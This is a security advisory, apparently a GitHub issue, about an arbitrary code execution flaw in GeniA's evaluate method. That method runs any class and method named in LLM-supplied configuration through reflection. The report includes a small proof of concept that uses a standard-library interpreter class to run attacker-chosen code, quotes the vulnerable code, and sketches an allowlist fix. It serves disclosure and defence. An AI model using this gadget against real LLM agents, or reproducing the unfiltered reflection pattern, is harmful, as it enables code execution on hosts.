Problem Description
In the file GeniA/genia/llm_function/python_function.py, the evaluate method directly executes user-configured Python classes and methods via reflection, without any filtering or security checks.
Risk Analysis
- Arbitrary Code Execution: An attacker could execute arbitrary Python code through a specially crafted function_config parameter.
- Privilege Escalation: the invoked code runs with the full privileges of the GeniA process, so system privilege restrictions could be bypassed and dangerous operations performed.
- Data Leakage: Sensitive data could be accessed or modified.
Steps to Reproduce
- Configure a Python class containing a malicious method.
- Pass the configuration of this class through the LLM interface.
- Observe that the method is executed unconditionally. A minimal illustration follows this list.
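A minimal, self-contained illustration of these steps, reduced to the reflection path shown under Relevant Code below. The gadget class, method, and payload are only example values for an attacker-influenced function_config; any standard-library class with a no-argument constructor and a code-executing method works the same way.

import importlib

# Illustrative crafted input (example values only): a stdlib class that can be
# instantiated with no arguments and whose method compiles and executes
# arbitrary Python source.
function_config = {
    "class": "code.InteractiveInterpreter",
    "method": "runsource",
}
parameters = {"source": "print('arbitrary code executed on the host')"}

# What evaluate() does with this input, reduced to its core steps:
module_name, _, class_name = function_config["class"].rpartition(".")
instance = getattr(importlib.import_module(module_name), class_name)()
getattr(instance, function_config["method"])(**parameters)  # attacker-controlled code runs here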
Suggested Fixes
- Implement a method allowlist mechanism (see the sketch after this list).
- Add a privilege checking layer.
- Strictly validate input parameters.
- Consider a sandboxed execution environment.
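A minimal sketch of the allowlist idea, to be called before any import or getattr in evaluate. All names below are hypothetical placeholders rather than actual GeniA tools; a real allowlist would be built from the project's registered skills.

# Sketch only: hypothetical allowlist mapping fully-qualified class names to
# the set of methods that may be invoked through the LLM interface.
ALLOWED_METHODS: dict[str, set[str]] = {
    "example_tools.deploy.DeploymentTool": {"get_status", "list_releases"},
}

def check_allowed(function_config: dict) -> tuple[str, str]:
    """Reject any class/method pair that is not explicitly registered."""
    fq_class_name = function_config.get("class", "")
    method_name = function_config.get("method", "")
    if method_name not in ALLOWED_METHODS.get(fq_class_name, set()):
        raise PermissionError(
            "function not allowlisted: {}.{}".format(fq_class_name, method_name)
        )
    return fq_class_name, method_name

evaluate would call check_allowed as its first statement, so importlib.import_module and getattr only ever see registered names; per-method parameter validation and a sandboxed or privilege-restricted execution environment would layer on top of this.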
Relevant Code
def evaluate(self, function_config: dict, parameters: dict) -> Any:
    try:
        fq_class_name = function_config.get("class")
        module_name_str, _, class_name = fq_class_name.rpartition(".")
        module = importlib.import_module(module_name_str)
        # class_name = self.sanitize_input(class_name)
        class_obj = getattr(module, class_name)
        if class_obj:
            instance = class_obj()  # Instantiate the class
            method = getattr(instance, function_config.get("method"))  # Get the method object
            return str(method(**parameters))  # Invoke the method
        else:
            self.logger.error("Class %s not found.", class_name)
            raise Exception("function config error: {}".format(function_config))
    except Exception as e:
        error_str = "{}: {}".format(type(e).__name__, str(e))
        self.logger.exception(error_str)
        return error_str